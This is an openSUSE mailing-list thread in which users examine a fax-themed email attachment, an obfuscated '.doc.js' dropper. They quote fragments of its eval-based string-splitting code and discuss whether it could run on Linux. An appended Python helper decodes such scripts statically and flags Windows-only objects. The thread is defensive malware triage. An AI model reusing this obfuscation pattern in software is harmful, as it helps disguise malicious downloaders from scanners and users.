[opensuse] I just got a bit of malware in the mail that might "work" on Linux.
Hi,

I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension.

It is a single line of probably javascript code.

var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur

Would this "work" on Linux? Somebody is interested in having a look at it?

-- 
Cheers/Saludos
Carlos E. R. (openSUSE Leap 42.1, test at Minas-Anor)

-- 
To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org
To contact the owner, e-mail: opensuse+owner@opensuse.org
On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R. wrote:
> It is a single line of probably javascript code.

sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.
* cagsm [11-09-15 11:13]:
> On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R. wrote:
>> It is a single line of probably javascript code.
>
> sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.

Please use private mail if you wish to issue admonitions. The mail is *not* html, it is *text*. And since when is code not allowed?

And, if you wish to jump on me, use private mail as I will not debate this further on-list.

-- 
(paka)Patrick Shanahan Plainfield, Indiana, USA @ptilopteri
http://en.opensuse.org openSUSE Community Member facebook/ptilopteri
http://wahoo.no-ip.org Photo Album: http://wahoo.no-ip.org/gallery2
Registered Linux User #207535 @ http://linuxcounter.net
On Mon, Nov 9, 2015 at 5:20 PM, Patrick Shanahan wrote:
> * cagsm [11-09-15 11:13]:
>> On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R. wrote:
>>> It is a single line of probably javascript code.
>>
>> sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.
>
> Please use private mail if you wish to issue admonitions. The mail is *not* html, it is *text*. And since when is code not allowed?
>
> And, if you wish to jump on me, use private mail as I will not debate this further on-list.

Where are you suddenly coming from? I replied to some carlos guy thread to the list. Also if the mail is text only then why worry what the text reads? Text email is text email. It can't be executed.
On 2015-11-09 17:36, cagsm wrote:
> On Mon, Nov 9, 2015 at 5:20 PM, Patrick Shanahan <> wrote:
>
> Where are you suddenly coming from? I replied to some carlos guy thread to the list. Also if the mail is text only then why worry what the text reads? Text email is text email. It can't be executed.

People, calm down :-)

All email is text, even when it contains pictures. It is a text based protocol. :-p

In this case, it contains a zipped attachment, which expands to something.doc.js. I.e., javascript text, which may be executed. Typically Linux tools do not attempt to execute programs coming by email, but it can be done with some insistent and clever clicking on the mouse.

I never tried to execute it. So it did not execute.

My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is) poses a real danger in Linux or not. Clamav does not signal it, and it is the only antivirus that currently has a Linux version that I know of.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote:
> My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is)

It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does.

-- 
Per Jessen, Zürich (12.2°C)
http://www.dns24.ch/ - your free DNS host, made in Switzerland.
On 2015-11-09 20:25, Per Jessen wrote:
> Carlos E. R. wrote:
>> My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is)
>
> It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does.

Done, thanks.

Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 2015-11-09 20:41, Carlos E. R. wrote:
> On 2015-11-09 20:25, Per Jessen wrote:
>> It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does.
>
> Done, thanks.
>
> Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document.

It bounced from you:

Diagnostic-Code: smtp; 552-5.7.0 This message was blocked because its content presents a potential
552-5.7.0 security issue. Please visit
552-5.7.0 https://support.google.com/mail/answer/6590 to review our message
552 5.7.0 content and attachment content guidelines. n19si3622488wjr.18 - gsmtp

I also got another bounce from another machine;

Time received: 11/9/2015 7:38:59 PM
Message ID: <5640F64C.3040607@telefonica.net>
Detections found: Message Body JS/Obfuscator.GX

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote:
> On 2015-11-09 20:25, Per Jessen wrote:
>> Carlos E. R. wrote:
>>> My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is)
>>
>> It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does.
>
> Done, thanks.
>
> Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document.

I suppose so - still a trojan horse with greek soldiers that can't get out isn't much good :-)

-- 
Per Jessen, Zürich (9.9°C)
http://www.hostsuisse.com/ - virtual servers, made in Switzerland.
On 2015-11-10 08:24, Per Jessen wrote:
> Carlos E. R. wrote:
>> Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document.
>
> I suppose so - still a trojan horse with greek soldiers that can't get out isn't much good :-)

LOL. Right.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 10/11/15 03:20, Patrick Shanahan wrote:
> * cagsm [11-09-15 11:13]:
>> On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R. wrote:
>>> It is a single line of probably javascript code.
>>
>> sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.
>
> Please use private mail if you wish to issue admonitions.

Oh Patrick, you are a card! :-D . Would you call your post to cagsm a non-admonishing e-mail? 8-)

> The mail is *not* html, it is *text*. And since when is code not allowed?
>
> And, if you wish to jump on me, use private mail as I will not debate this further on-list.

R-i-g-h-t ... you will not debate this further on-list. Fair 'nuff in which case I will not further provoke your religious beliefs by making additional comments here in public.

BC

-- 
Using openSUSE 13.2, KDE 4.14.9 & kernel 4.3.0-1 on a system with-
AMD FX 8-core 3.6/4.2GHz processor
16GB PC14900/1866MHz Quad Channel RAM
Gigabyte AMD3+ m/board; Gigabyte nVidia GTX660 GPU
On 10/11/15 19:10, Basil Chupin wrote:
> On 10/11/15 03:20, Patrick Shanahan wrote:
>> * cagsm [11-09-15 11:13]:
>>> On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R. wrote:
>>>> It is a single line of probably javascript code.
>>>
>>> sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.
>>
>> Please use private mail if you wish to issue admonitions.
>
> Oh Patrick, you are a card! :-D .
>
> Would you call your post to cagsm a non-admonishing e-mail? 8-)
>
>> The mail is *not* html, it is *text*. And since when is code not allowed?
>>
>> And, if you wish to jump on me, use private mail as I will not debate this further on-list.
>
> R-i-g-h-t ... you will not debate this further on-list. Fair 'nuff in which case I will not further provoke your religious beliefs by making additional comments here in public.

I have to report that Patrick and I have had an exchange of e-mails re this matter and while he would like to add some comments, but because he is a man of his word ( "...I will not debate this further on-list") he won't do so, which is something I applaud him for.

(But it doesn't mean I won't kick you in the shin next time you step out of line, Patrick! :-) .)

BC

-- 
Using openSUSE 13.2, KDE 4.14.9 & kernel 4.3.0-1 on a system with-
AMD FX 8-core 3.6/4.2GHz processor
16GB PC14900/1866MHz Quad Channel RAM
Gigabyte AMD3+ m/board; Gigabyte nVidia GTX660 GPU
On 11/09/2015 05:04 PM, cagsm wrote:
> sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.

Who said I executed it?

-- 
Cheers/Saludos
Carlos E. R. (openSUSE Leap 42.1, test at Minas-Anor)
On 11/09/2015 05:57 PM, Carlos E. R. wrote:
> Would this "work" on Linux?

- mr Varnell of clamav list will probably know :...............

regards
On 2015-11-09 17:05, ellanios82 wrote:
> On 11/09/2015 05:57 PM, Carlos E. R. wrote:
>> Would this "work" on Linux?
> - mr Varnell of clamav list will probably know :

I guess I could post to that list.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 2015-11-09 20:02, Carlos E. R. wrote:
> On 2015-11-09 17:05, ellanios82 wrote:
>> On 11/09/2015 05:57 PM, Carlos E. R. wrote:
>>> Would this "work" on Linux?
>> - mr Varnell of clamav list will probably know :
>
> I guess I could post to that list.

clamav does not see it as virii:

cer@Telcontar:~/viruses/tmp> clamscan scan_00000810300.doc.js
scan_00000810300.doc.js: OK

----------- SCAN SUMMARY -----------
Known viruses: 4091764
Engine version: 0.98.7
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.01 MB
Data read: 0.00 MB (ratio 2.00:1)
Time: 6.836 sec (0 m 6 s)
cer@Telcontar:~/viruses/tmp>

cer@Telcontar:~/viruses/tmp> file scan_00000810300.doc.js
scan_00000810300.doc.js: ASCII text, with very long lines, with no line terminators
cer@Telcontar:~/viruses/tmp>

neither does antivir, an old version.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote:
> On 2015-11-09 20:02, Carlos E. R. wrote:
>> On 2015-11-09 17:05, ellanios82 wrote:
>>> On 11/09/2015 05:57 PM, Carlos E. R. wrote:
>>>> Would this "work" on Linux?
>>> - mr Varnell of clamav list will probably know :
>>
>> I guess I could post to that list.
>
> clamav does not see it as virii:

Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.

-- 
Per Jessen, Zürich (12.2°C)
http://www.dns24.ch/ - your free DNS host, made in Switzerland.
On 2015-11-09 20:23, Per Jessen wrote:
> Carlos E. R. wrote:
>
> Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.

I don't know, it is code. I can't read javascript, but I'll have a guess at it.

e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();

That looks very ugly to me. But it may be only obfuscation. It seems to start with a declaration section:

var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C505556555E55";
function y5(){return 'xa.clo';};
function c8(){return 'jet.c';};
function n9(){return ' = WS';};
function r8(){return 'ODB.Str';};
function b8(){return 'eam"); ';};
function t7(){return 'cript';};
function a2(){return 'i++) { ';};
function v2(){return 'n(fn+n+';};
function g2(){return 'eObject';};
function n1(){return 'var b';};
function e9(){return '};';};
function u7(){return '; xa.w';};
function x1(){return 'tring';};
function y7(){return '); va';};
function b9(){return '".exe",';};
function i2(){return eval;};

which declares a lot of functions (like replacement macros in C, I guess). At the end, there is another section with the actual calls:

e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();e7+=c6();e7+=o9();e7+=l0();

You see, it is a funny way of obfuscating a script. The last command is:

i2()(e7);

which is probably the actual code, after creating an "e7" string with whatever it really wants to do.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote:
> On 2015-11-09 20:23, Per Jessen wrote:
>> Carlos E. R. wrote:
>>
>> Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.
>
> I don't know, it is code. I can't read javascript, but I'll have a guess at it.
>
> e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();
>
> That looks very ugly to me. But it may be only obfuscation. It seems to start with a declaration section:
>
> var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C505556555E55";
> function y5(){return 'xa.clo';}; function c8(){return 'jet.c';}; function n9(){return ' = WS';}; function r8(){return 'ODB.Str';}; function b8(){return 'eam"); ';}; function t7(){return 'cript';}; function a2(){return 'i++) { ';}; function v2(){return 'n(fn+n+';}; function g2(){return 'eObject';}; function n1(){return 'var b';}; function e9(){return '};';}; function u7(){return '; xa.w';}; function x1(){return 'tring';}; function y7(){return '); va';}; function b9(){return '".exe",';};
> function i2(){return eval;};
>
> which declares a lot of functions (like replacement macros in C, I guess). At the end, there is another section with the actual calls:
>
> e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();e7+=c6();e7+=o9();e7+=l ();

I guess you didn't post all of the code? Most of those functions aren't defined above. It looks similar to this:

https://www.hybrid-analysis.com/sample/3af098f396af3e6f5d56107ba443546cddda2...

My guess is that it'll take you to a website for downloading a trojan.

-- 
Per Jessen, Zürich (10.2°C)
http://www.hostsuisse.com/ - dedicated server rental in Switzerland.
On 2015-11-10 08:40, Per Jessen wrote:
> I guess you didn't post all of the code?

No, certainly. I did not want to trigger filters. ;-)

> Most of those functions aren't defined above. It looks similar to this:
>
> https://www.hybrid-analysis.com/sample/3af098f396af3e6f5d56107ba443546cddda2...

Yes, exactly.

> My guess is that it'll take you to a website for downloading a trojan.

My, what a complicated way... Would that work in Linux, or the target is Windows only? I saw a string mentioning ".exe".

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
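A static triage helper, added here as an example (it is not code from this thread, from openSUSE or from any tool named in it): it resolves the tiny string-returning functions and the e7 += accumulation that Carlos's breakdown above describes without ever executing the script, then reports whether the text handed to eval references Windows Script Host / COM objects such as WScript or ADODB.Stream, which have no runtime on Linux and so answer the "would it work on Linux?" question. SAMPLE_JS is a constructed input in the same shape as the quoted fragment, not the original attachment; the regexes and indicator list are assumptions of this example.

```python
import re

# Constructed sample in the same shape as the fragment quoted in the thread:
# tiny functions returning string pieces, an accumulator built with +=, then
# a function that returns eval applied to it.  NOT the original attachment;
# the assembled text is only indicator strings, not a working script.
SAMPLE_JS = (
    "var str=\"5552505E\";"
    "function n1(){return 'var xa';}function n9(){return ' = WS';}"
    "function t7(){return 'cript.Creat';}function g2(){return 'eObject(\"AD';}"
    "function r8(){return 'ODB.Str';}function b8(){return 'eam\"); ';}"
    "function y5(){return 'xa.clo';}function e9(){return 'se();';}"
    "function i2(){return eval;}"
    "var e7='';e7+=n1();e7+=n9();e7+=t7();e7+=g2();e7+=r8();e7+=b8();"
    "e7+=y5();e7+=e9();i2()(e7);"
)

# function NAME(){return 'literal';}   or   function NAME(){return eval;}
FUNC_RE = re.compile(
    r"function\s+(\w+)\s*\(\)\s*\{\s*return\s+(?:'([^']*)'|\"([^\"]*)\"|(eval))\s*;?\s*\}"
)
CALL_RE = re.compile(r"(\w+)\s*\+=\s*(\w+)\(\)\s*;")   # e7+=n1();
EVAL_RE = re.compile(r"(\w+)\(\)\s*\(\s*(\w+)\s*\)")   # i2()(e7)

# Objects that exist only under Windows Script Host / COM, not in a browser
# and not on Linux.  Their presence in the eval'd text marks a Windows-only
# dropper (indicator list is an assumption of this example).
WINDOWS_ONLY = ("WScript", "ActiveXObject", "ADODB.Stream", "Shell.Application", ".exe")


def collect_fragments(js):
    """Map each helper function to the literal it returns; note eval aliases."""
    frags, eval_aliases = {}, set()
    for name, sq, dq, ev in FUNC_RE.findall(js):
        if ev:
            eval_aliases.add(name)
        else:
            frags[name] = sq if sq else dq
    return frags, eval_aliases


def rebuild(js):
    """Re-assemble every += accumulator statically; nothing is executed."""
    frags, eval_aliases = collect_fragments(js)
    acc = {}
    for target, fn in CALL_RE.findall(js):
        acc[target] = acc.get(target, "") + frags.get(fn, "")
    evaled = [var for fn, var in EVAL_RE.findall(js) if fn in eval_aliases]
    return acc, evaled


def triage(js):
    """Report what is eval'd and which Windows-only objects it references."""
    acc, evaled = rebuild(js)
    text = "".join(acc[v] for v in evaled if v in acc)
    hits = [ind for ind in WINDOWS_ONLY if ind in text]
    return {
        "eval_targets": evaled,
        "rebuilt": text,
        "indicators": hits,
        "windows_only": bool(evaled) and bool(hits),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

The hex blob in `str` is left undecoded on purpose: its encoding is not known from the fragment, and the WSH-only object names in the rebuilt text are already enough to classify the sample as a Windows-only dropper.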
On 11/09/2015 07:57 AM, Carlos E. R. wrote:
> Hi,
>
> I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension.
>
> It is a single line of probably javascript code.
>
> var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur
>
> Would this "work" on Linux? Somebody is interested in having a look at it?

I get a dozen of these a day in my spam trap. It's always in a zip or a pdf, or a fax of something mislabeled. I seldom ever look at these at all, but they score low enough in spamassassin to get into the spam bin as opposed to being summarily junked by Amavisd.

Anyway, I never touch them on a windows machine, do all my inspections on linux, and have never had one of these do anything, but then the only thing I do is LOOK at the contents of the zip. I can't imagine trying to execute one of these things, even as an experiment, even in a virtual machine.

I can't imagine yours is special in any way, these things are everywhere, and anyone interested in researching these to see if they might work in linux has a boat load of them to work with.

-- 
After all is said and done, more is said than done.
On 2015-11-09 19:36, John Andersen wrote:
> On 11/09/2015 07:57 AM, Carlos E. R. wrote:
>
> Anyway, I never touch them on a windows machine, do all my inspections on linux, and have never had one of these do anything, but then the only thing I do is LOOK at the contents of the zip.

Yes, same here, I looked out of curiosity. And I got interested when I saw that it seems to be javascript; Thunderbird, for instance, can execute javascript in email. Also it has no html. It is plain text.

I don't get a lot of spam, anyway. Some days none at all. Thunderbird does not signal this one as bad, though, nor my ISP. Which is why I looked at it.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 11/09/2015 11:01 AM, Carlos E. R. wrote:
> Thunderbird, for instance, can execute javascript in email.

It can, but doesn't by default. Who would turn that on? Pretty sure no one on this list ... ;-)

-- 
After all is said and done, more is said than done.
On 2015-11-09 20:04, John Andersen wrote:
> On 11/09/2015 11:01 AM, Carlos E. R. wrote:
>> Thunderbird, for instance, can execute javascript in email.
>
> It can, but doesn't by default. Who would turn that on? Pretty sure no one on this list ... ;-)

Actually, many. Me, for instance.

See, Thunderbird comes with a calendar thing by default nowadays, which you can sync with google by using "provider for Google Calendar". Well, this thing, at least when authenticating, requires javascript to be enabled. I know this for a fact because I had it disabled and it failed.

(I don't care if Thunderbird has a calendar, but I do use the Google calendar a lot in my mobile phone. Being able to access it in the computer is very handy. Yes, I know I can do it via web too.)

Thus I use this Thunderbird feature. And having javascript enabled scares me more than a bit.

-- 
Cheers / Saludos,
Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 11/09/2015 10:57 AM, Carlos E. R. wrote:
> Hi,
>
> I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension.
>
> It is a single line of probably javascript code.
>
> var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur
>
> Would this "work" on Linux? Somebody is interested in having a look at it?

I think you'd better hope that it _won't_ work on Linux! I looked at it in Linux also, and just reading the file does no damage. I did not try to make it "work." I'm not crazy!

--doug
participants (8)
- Basil Chupin
- cagsm
- Carlos E. R.
- Doug
- ellanios82
- John Andersen
- Patrick Shanahan
- Per Jessen